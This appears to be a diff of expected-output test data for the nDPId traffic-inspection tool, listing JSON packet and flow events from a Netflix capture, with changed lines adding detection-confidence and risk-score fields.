 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1484319032888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319032888,"pkt":"gCqoTGHM5JjWH70UCABFAABA+AxAAEAGfcXAqAEHNkXM8c9xAbuJGKiDAAAAALAC\/\/+XvgAAAgQFtAEDAwUBAQgKH2S4KwAAAAAEAgAA"}
 00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032896,"flow_last_seen":1484319032896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319032896,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1484319032896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319032896,"pkt":"gCqoTGHM5JjWH70UCABFAABADepAAEAGIy3AqAEHNr8RM896Abu7NDMxAAAAALAC\/\/+WKQAAAgQFtAEDAwUBAQgKH2S4MgAAAAAEAgAA"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1484319032934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319032934,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGjLY2RczxwKgBBwG7z3E0MsEbiRiohKASReqX9AAAAgQFtAQCCAqFp0\/bH2S4KwEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1484319032937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319032937,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mxZAAEAG2sfAqAEHNkXM8c9xAbuJGKiENDLBHIAQEBX8aAAAAQEICh9kuFmFp0\/b"}
-00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}}
+00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032888,"flow_last_seen":1484319032938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1484319032938,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1484319032943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319032943,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGR\/s2vxEzwKgBBwG7z3pSqS+duzQzMqASOJAFFAAAAgQFtAQCCAqtijmlH2S4MgEDAwg="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1484319032944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319032944,"pkt":"gCqoTGHM5JjWH70UCABFAAA0cYhAAEAGv5rAqAEHNr8RM896Abu7NDMyUqkvnoAQEBVcLgAAAQEICh9kuGCtijml"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032896,"flow_last_seen":1484319032959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1484319032959,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032984,"flow_last_seen":1484319032984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319032984,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1484319032984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319032984,"pkt":"gCqoTGHM5JjWH70UCABFAABAh8JAAEAG+QHAqAEHNCDEJM97AbvHy0puAAAAALAC\/\/\/BrQAAAgQFtAEDAwUBAQgKH2S4hgAAAAAEAgAA"}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319032986,"flow_last_seen":1484319032986,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319032986,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1484319032986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319032986,"pkt":"gCqoTGHM5JjWH70UCABFAABAdf5AAEAGCsbAqAEHNCDEJM98AbvweU0rAAAAALAC\/\/+WPwAAAgQFtAEDAwUBAQgKH2S4iAAAAAAEAgAA"}
-00884{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}}
-01314{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01243{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
+00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032888,"flow_last_seen":1484319032990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1484319032990,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"spdy\/3.1,spdy\/3,http\/1.1"}}
+01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"netflix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032888,"flow_last_seen":1484319032991,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"ts_msec":1484319032991,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.69.204.241","src_port":53105,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ichnaea.netflix.com","server_names":"ichnaea.netflix.com,beacon.netflix.com,presentationtracking.netflix.com,nmtracking.netflix.com,customerevents.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=customerevents.netflix.com","alpn":"spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"50:D6:DB:AF:1D:A3:83:52:E6:0E:15:8F:98:78:EE:2F:23:FD:E2:3F"}}
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032896,"flow_last_seen":1484319033008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"ts_msec":1484319033008,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01349{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"netflix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032896,"flow_last_seen":1484319033017,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"ts_msec":1484319033017,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53114,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1484319033029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319033029,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGl6g0IMQkwKgBBwG7z3ve3c1cx8tKb6ASRepkbwAAAgQFtAQCCAq2m8VuH2S4hgEDAwg="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1484319033032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319033032,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGlqg0IMQkwKgBBwG7z3xLWYWT8HlNLKASReoUTgAAAgQFtAQCCAq2m8VvH2S4iAEDAwg="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1484319033032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319033032,"pkt":"gCqoTGHM5JjWH70UCABFAAA0rMBAAEAG1A\/AqAEHNCDEJM97AbvHy0pv3t3NXYAQEBXI5wAAAQEICh9kuLC2m8Vu"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032984,"flow_last_seen":1484319033033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319033033,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1484319033038,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319033038,"pkt":"gCqoTGHM5JjWH70UCABFAAA0iIJAAEAG+E3AqAEHNCDEJM98AbvweU0sS1mFlIAQEBV4xgAAAQEICh9kuLK2m8Vv"}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319032986,"flow_last_seen":1484319033038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1484319033038,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032984,"flow_last_seen":1484319033086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1484319033086,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
-01364{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"netflix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319032984,"flow_last_seen":1484319033087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3128,"flow_avg_l4_payload_len":446,"midstream":0,"ts_msec":1484319033087,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53115,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"netflix.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319032986,"flow_last_seen":1484319033098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1680,"flow_avg_l4_payload_len":280,"midstream":0,"ts_msec":1484319033098,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.196.36","src_port":53116,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
